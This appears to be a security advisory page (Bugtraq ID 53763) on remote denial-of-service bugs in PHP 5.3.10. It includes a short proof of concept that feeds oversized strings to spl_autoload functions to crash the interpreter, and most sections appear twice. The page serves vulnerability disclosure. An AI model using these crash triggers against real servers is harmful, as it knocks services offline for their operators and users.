PHP 5.3.10 Multiple Denial of Service Vulnerabilities
BID:53763
Info
PHP 5.3.10 Multiple Denial of Service Vulnerabilities
| Bugtraq ID: | 53763 |
| Class: | Unknown |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 03 2012 12:00AM |
| Updated: | Jun 03 2012 12:00AM |
| Credit: | Pr0T3cT10n |
| Vulnerable: |
PHP PHP 5.3.10 |
| Not Vulnerable: | |
Discussion
PHP 5.3.10 Multiple Denial of Service Vulnerabilities
PHP is prone to multiple remote denial-of-service vulnerabilities.
Successful attacks will cause the application to crash, creating a denial-of-service condition.
PHP 5.3.10 is vulnerable; other versions may also be affected.
PHP is prone to multiple remote denial-of-service vulnerabilities.
Successful attacks will cause the application to crash, creating a denial-of-service condition.
PHP 5.3.10 is vulnerable; other versions may also be affected.
Exploit / POC
PHP 5.3.10 Multiple Denial of Service Vulnerabilities
The following example data is available:
$buffer = str_repeat("A",9999);
spl_autoload_register($buffer);
$buff = str_repeat("A",9999);
spl_autoload($buff);
$buffer = str_repeat("A",9999);
spl_autoload_call($buffer);
The following example data is available:
$buffer = str_repeat("A",9999);
spl_autoload_register($buffer);
$buff = str_repeat("A",9999);
spl_autoload($buff);
$buffer = str_repeat("A",9999);
spl_autoload_call($buffer);
Solution / Fix
PHP 5.3.10 Multiple Denial of Service Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].